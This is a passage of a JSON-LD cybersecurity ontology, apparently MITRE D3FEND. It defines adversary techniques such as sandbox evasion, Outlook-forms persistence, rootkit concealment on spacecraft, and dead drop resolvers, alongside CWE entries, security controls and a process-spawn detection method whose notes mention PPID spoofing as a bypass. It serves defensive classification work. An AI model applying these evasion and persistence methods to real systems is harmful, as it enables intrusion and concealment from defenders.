      "d3f:definition": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "Virtualization/Sandbox Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        }
      ]
    },
    {
      "@id": "d3f:UnloadLibraryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process unloads a dynamically linked library or module, reducing its memory footprint or functionality.",
      "rdfs:label": "Unload Library Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/module_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N7d647429c0fc49898f84fb08bcf12dc3"
        },
        {
          "@id": "_:N69ae8a9f266c42d1b7fddbd8f7352d52"
        }
      ]
    },
    {
      "@id": "_:N7d647429c0fc49898f84fb08bcf12dc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N69ae8a9f266c42d1b7fddbd8f7352d52",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoadLibraryEvent"
      }
    },
    {
      "@id": "d3f:T1137.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:OfficeApplicationFile"
      },
      "d3f:attack-id": "T1137.003",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)",
      "rdfs:label": "Outlook Forms",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:N84d7641450624d41a53d6fa613df3536"
        }
      ]
    },
    {
      "@id": "_:N84d7641450624d41a53d6fa613df3536",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplicationFile"
      }
    },
    {
      "@id": "d3f:T1657",
      "@type": "owl:Class",
      "d3f:attack-id": "T1657",
      "d3f:definition": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin)",
      "rdfs:label": "Financial Theft",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:IMP-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0001",
      "d3f:definition": "Measures designed to mislead an adversary by manipulation, distortion, or falsification of evidence or information into a system to induce the adversary to react in a manner prejudicial to their interests. Threat actors may seek to deceive mission stakeholders (or even military decision makers) for a multitude of reasons. Telemetry values could be modified, attacks could be designed to intentionally mimic another threat actor's TTPs, and even allied ground infrastructure could be compromised and used as the source of communications to the spacecraft.",
      "rdfs:label": "Deception (or Misdirection) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Deception (or Misdirection)"
    },
    {
      "@id": "d3f:TA0027",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Initial Access - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "RA-5(2)"
    },
    {
      "@id": "d3f:DHCPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Dynamic Host Configuration Protocol (DHCP), a UDP-based protocol used to dynamically assign IP addresses and configure network parameters, enabling devices to communicate efficiently on a network.",
      "rdfs:label": "DHCP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/dhcp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:UDPEvent"
        },
        {
          "@id": "_:Nf565b9b868b84cf9a3fece9a77255565"
        }
      ]
    },
    {
      "@id": "_:Nf565b9b868b84cf9a3fece9a77255565",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SystemStateImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system image is a serialized copy of the entire state of a computer system stored in some non-volatile form, such as a binary executable file.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/System_image"
      },
      "rdfs:label": "System State Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/System_Image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageImage"
      },
      "skos:altLabel": "System Image"
    },
    {
      "@id": "d3f:Semi-supervisedInductiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSIL",
      "d3f:definition": "The goal of inductive learning is to infer the correct mapping from X to Y.",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning#Semi-supervised_learning).\n\nZhou, D., & Li, M. (2005). Semi-supervised learning by higher order regularization. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL) (pp. 1-9).  [Link](https://www.cs.sfu.ca/~anoop/papers/pdf/semisup_naacl.pdf).",
      "rdfs:label": "Semi-supervised Inductive Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1102.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.001",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.",
      "rdfs:label": "Dead Drop Resolver",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:CCI-002715_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically shuts the information system down, restarts the information system, and/or implements organization-defined security safeguards when integrity violations are discovered.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002715"
    },
    {
      "@id": "d3f:AML.T0015",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0015",
      "d3f:definition": "Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevents an AI model from correctly identifying the contents of the data or [Generate Deepfakes](/techniques/AML.T0088) that fool an AI model expecting authentic data.\n\nThis technique can be used to evade a downstream task where AI is utilized. The adversary may evade AI-based virus/malware detection or network scanning towards the goal of a traditional cyber attack. AI model evasion through deepfake generation may also provide initial access to systems that use AI-based biometric authentication.",
      "rdfs:label": "Evade AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATLASImpactTechnique"
        },
        {
          "@id": "d3f:ATLASInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Evade AI Model"
    },
    {
      "@id": "d3f:CombinationLock",
      "@type": "owl:Class",
      "d3f:definition": "A combination lock is a type of locking device in which a sequence of symbols, usually numbers, is used to open the lock.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Combination_lock"
      },
      "rdfs:label": "Combination Lock",
      "rdfs:seeAlso": "Federal Specification FF-L-2937",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLock"
        },
        {
          "@id": "_:N4f9cd17ee7b146d181fef19e54ec5484"
        }
      ]
    },
    {
      "@id": "_:N4f9cd17ee7b146d181fef19e54ec5484",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:Reference-PLCKeySwitchMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/"
      },
      "d3f:kb-abstract": "Programmable Logic Controllers (PLC) and Safety Instrumented Systems (SIS) Controllers have historically included an external switch, generally in the form of a key, to perform maintenance and troubleshooting. The key switch has become commonplace for automation engineers and technicians who maintain and support these systems and understand the importance of the little switch in overall device operation and how it affects the underlying process.",
      "d3f:kb-author": "DRAGOS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperatingModeMonitoring"
      },
      "d3f:kb-reference-title": "Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure",
      "rdfs:label": "Reference - Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure"
    },
    {
      "@id": "d3f:ApplicationRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an application is sequentially stopped and started, typically to refresh its state, apply updates, or resolve issues while preserving its availability.",
      "rdfs:label": "Application Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Na03b7432d3c7409ba6774e8657389c8f"
        },
        {
          "@id": "_:N988a424f8e0c4501b6fc371585bf6757"
        }
      ]
    },
    {
      "@id": "_:Na03b7432d3c7409ba6774e8657389c8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStopEvent"
      }
    },
    {
      "@id": "_:N988a424f8e0c4501b6fc371585bf6757",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStartEvent"
      }
    },
    {
      "@id": "d3f:T1451",
      "@type": "owl:Class",
      "d3f:attack-id": "T1451",
      "d3f:definition": "Adversaries may gain access to mobile devices through transfers or swaps from victims’ phone numbers to adversary-controlled SIM cards and mobile devices.(Citation: ATT SIM Swap Scams)(Citation: Verizon SIM Swapping)",
      "rdfs:label": "SIM Card Swap - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "SIM Card Swap"
    },
    {
      "@id": "d3f:CWE-529",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-529",
      "d3f:definition": "The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.",
      "rdfs:label": "Exposure of Access Control List Files to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:T1058",
      "@type": "owl:Class",
      "d3f:attack-id": "T1058",
      "d3f:definition": "Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.011",
      "rdfs:label": "Service Registry Permissions Weakness",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1541",
      "@type": "owl:Class",
      "d3f:attack-id": "T1541",
      "d3f:definition": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)",
      "rdfs:label": "Foreground Persistence - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Foreground Persistence"
    },
    {
      "@id": "d3f:EX-0010.03",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.03",
      "d3f:definition": "A rootkit hides the presence and activity of other malicious components by interposing on the mechanisms that report system state. On spacecraft this can occur within flight software processes, at OS kernel level, inside separation kernels/hypervisors, or down in system firmware where drivers and initialization routines run. Techniques include API and syscall hooking, patching message queues and inter-process communication paths, altering task lists and scheduler views, filtering telemetry packets and event logs, and rewriting sensor or health values before they are recorded or downlinked. Rootkits may also hook command handlers and gateways so certain opcodes, timetags, or sources are silently accepted or ignored while external observers see normal acknowledgments. Because many missions rely on deterministic procedures and limited observability, even small alterations to reporting can make malicious actions appear as plausible mode transitions or benign anomalies. Persistence often pairs with the concealment layer, with the rootkit reinjecting companions after resets or rebuilds by monitoring for specific files, tables, or image loads and modifying them on the fly.",
      "d3f:modifies": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SystemFirmware"
        }
      ],
      "rdfs:label": "Rootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/03/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Na6333df5c1564ae393ba86909c169ebb"
        },
        {
          "@id": "_:Nc8ec17c87c4c4245b7f8e4b9af3ab1a8"
        },
        {
          "@id": "_:N86f029d1356a4efbade97a985464a77e"
        },
        {
          "@id": "_:N2bdd31cafd0a4cf793120c3d4903cde3"
        }
      ],
      "skos:prefLabel": "Rootkit"
    },
    {
      "@id": "_:Na6333df5c1564ae393ba86909c169ebb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nc8ec17c87c4c4245b7f8e4b9af3ab1a8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:N86f029d1356a4efbade97a985464a77e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:N2bdd31cafd0a4cf793120c3d4903cde3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:CWE-1312",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1312",
      "d3f:definition": "The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.",
      "rdfs:label": "Missing Protection for Mirrored Regions in On-Chip Fabric Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareBehaviorAnalysisConFirm",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://sites.nyuad.nyu.edu/moma/pdfs/pubs/C22.pdf"
      },
      "d3f:kb-abstract": "The modernization of various critical infrastructure components has dictated the use of microprocessor-based embedded control systems in critical applications. It is often infeasible, however, to employ the same level of security measures used in general purpose computing systems, due to the stringent performance and resource constraints of embedded devices. Furthermore, as software relies on the firmware for proper operation, no software-level technique can detect malicious behavior of the firmware. In this work, we propose ConFirm, a low-cost technique to detect malicious modifications in the firmware of embedded systems by measuring the number of low-level hardware events that occur during the execution of the firmware.",
      "d3f:kb-author": "Xueyang Wang, Charalambos Konstantinou, Michail Maniatakos, Ramesh Karri",
      "d3f:kb-organization": "Department of Electrical and Computer Engineering, Polytechnic School of Engineering, New York University and Department of Electrical and Computer Engineering, New York University Abu Dhabi",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareBehaviorAnalysis"
      },
      "d3f:kb-reference-title": "ConFirm: Detecting Firmware Modifications in Embedded Systems using Hardware Performance Counters",
      "rdfs:label": "Reference - Firmware Behavior Analysis ConFirm"
    },
    {
      "@id": "d3f:T1016.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1016.002",
      "d3f:definition": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.",
      "rdfs:label": "Wi-Fi Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1016"
      }
    },
    {
      "@id": "d3f:T1573",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573",
      "d3f:definition": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Encrypted Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N97748fe7b5e54544895667accd99a544"
        }
      ],
      "skos:altLabel": [
        "Custom Command and Control Protocol",
        "Custom Cryptographic Protocol",
        "Multilayer Encryption"
      ]
    },
    {
      "@id": "_:N97748fe7b5e54544895667accd99a544",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:OutboundInternetRPCTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Outbound internet RPC traffic is RPC traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard RPC protocol.",
      "rdfs:label": "Outbound Internet RPC Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "dbr:Remote_procedure_call"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "d3f:RPCNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0011",
      "d3f:definition": "The adversary is trying to manipulate, interrupt, erode confidence in, or destroy your AI systems and data.\n\nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.\nTechniques used for impact can include destroying or tampering with data.\nIn some cases, business processes can look fine, but may have been altered to benefit the adversaries' goals.\nThese techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.",
      "rdfs:label": "Impact - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:Reference-RedHatEnterpriseLinux8SecurityTechnicalImplementationGuide",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.stigviewer.com/stig/red_hat_enterprise_linux_8/"
      },
      "d3f:kb-abstract": "Red Hat Enterprise Linux 8 Security Guidelines",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:kb-reference-title": "Red Hat Enterprise Linux 8 Security Technical Implementation Guide",
      "rdfs:label": "Reference - Red Hat Enterprise Linux 8 Security Technical Implementation Guide"
    },
    {
      "@id": "d3f:OpticalDiscImage",
      "@type": "owl:Class",
      "d3f:definition": "An optical disc image (or ISO image, from the ISO 9660 file system used with CD-ROM media) is a disk image that contains everything that would be written to an optical disc, disk sector by disc sector, including the optical disc file system.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Optical_disc_image"
      },
      "rdfs:label": "Optical Disc Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Optical_disc_image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiskImage"
      }
    },
    {
      "@id": "d3f:Reference-GS_BufferSecurityCheck_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/gs-buffer-security-check?view=vs-2019"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft Docs",
      "d3f:kb-reference-of": {
        "@id": "d3f:StackFrameCanaryValidation"
      },
      "d3f:kb-reference-title": "/GS (Buffer Security Check)",
      "rdfs:label": "Reference - /GS (Buffer Security Check) - Microsoft Docs"
    },
    {
      "@id": "d3f:ProcessSpawnAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSpawnAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:Process"
        }
      ],
      "d3f:d3fend-id": "D3-PSA",
      "d3f:definition": "Analyzing spawn arguments or attributes of a process to detect processes that are unauthorized.",
      "d3f:kb-article": "## How it works\nProcess attributes are established when an operating system spawns a new process. These attributes are analyzed to look for the presence or absence of specific values or patterns.\n\nSome attributes of interest are:\n - user\n - process name\n - image path\n - security content\n\n## Considerations\n\n - Attackers can spoof the parent process identifier (PPID), which could bypass this defense to allow execution of a malicious process from an arbitrary parent process.\n - Attackers could have compromised any of the process properties, such as the user, so that the execution appears legitimate.\n - Location: If the full image path is not checked, there could be a conflict with an executable that appears earlier due to resolution involving the system environment path/classpath variable.\n - Parsing issues: If the raw command from a shell is analyzed, rather than the actual function call, it is important to identify the actual command being run from its arguments. In Windows, services with unquoted file paths containing spaces will try to use the first token as the executable and the rest as arguments -- and shift tokens to the executable until a valid one is found.\n - Some [operating systems](/dao/artifact/d3f:OperatingSystem) can spawn processes without forking.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveDirectoryDumpingViaNTDSUtil_MITRE"
        },
        {
          "@id": "d3f:Reference-CommandLineUsageOfArchivingSoftware_MITRE"
        },
        {
          "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other"
        },
        {
          "@id": "d3f:Reference-CredentialDumpingViaMimikatz_MITRE"
        },
        {
          "@id": "d3f:Reference-HostDiscoveryCommands_MITRE"
        },
        {
          "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE"
        },
        {
          "@id": "d3f:Reference-PowershellExecution_MITRE"
        },
        {
          "@id": "d3f:Reference-RunDLL32.exeMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-Squiblydoo_MITRE"
        },
        {
          "@id": "d3f:Reference-SuspiciousArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-SuspiciousRunLocations_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-04-001%3AShadowCopyDeletion_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-05-003%3ARareLolBASCommandLines_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-08-001%3ANTFSAlternateDataStreamExecution-SystemUtilities_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-003%3AIndicatorBlocking-DriverUnloaded_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-004%3ACredentialsInFiles%26Registry_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-003%3ADLLInjectionWithMavinject_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-005%3AClearPowershellConsoleCommandHistory_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-006%3ALocalPermissionGroupDiscovery_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-007%3ANetworkShareConnectionRemoval_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-008%3AMSBuildAndMsxsl_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-009%3ACompiledHTMLAccess_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-002%3AUnusuallyLongCommandLineStrings_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-003%3AClearingWindowsLogsWithWevtutil_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-004%3AUnusualChildProcessForSpoolsv.ExeOrConnhost.Exe_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-006%3AUnusualChildProcessSpawnedUsingDDEExploit_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-007%3ADetectingTamperingOfWindowsDefenderCommandPrompt_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-008%3ADisableUAC_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-009%3ADetectingShadowCopyDeletionViaVssadmin.exe_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-02-001%3AWebshell-IndicativeProcessTree_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-04-001%3ACommonWindowsProcessMasquerading_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-001%3AAttemptToAddCertificateToUntrustedStore_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-002%3ABatchFileWriteToSystem32_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-004%3ABITSJobPersistence_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-005%3ABITSAdminDownloadFile_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-006%3ACertUtilDownloadWithURLCacheAndSplitArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-007%3ACertUtilDownloadWithVerifyCtlAndSplitArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-008%3ACertutilExeCertificateExtraction_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-009%3ACertUtilWithDecodeArgument_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-010%3ACreateLocalAdminAccountsUsingNetExe_MITRE"
        }
      ],
      "rdfs:label": "Process Spawn Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Nc9bd65885ae44b79991b34710675a277"
        },
        {
          "@id": "_:N23456c686fdd4bc19fa4e523a23c65bd"
        }
      ]
    },
    {
      "@id": "_:Nc9bd65885ae44b79991b34710675a277",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
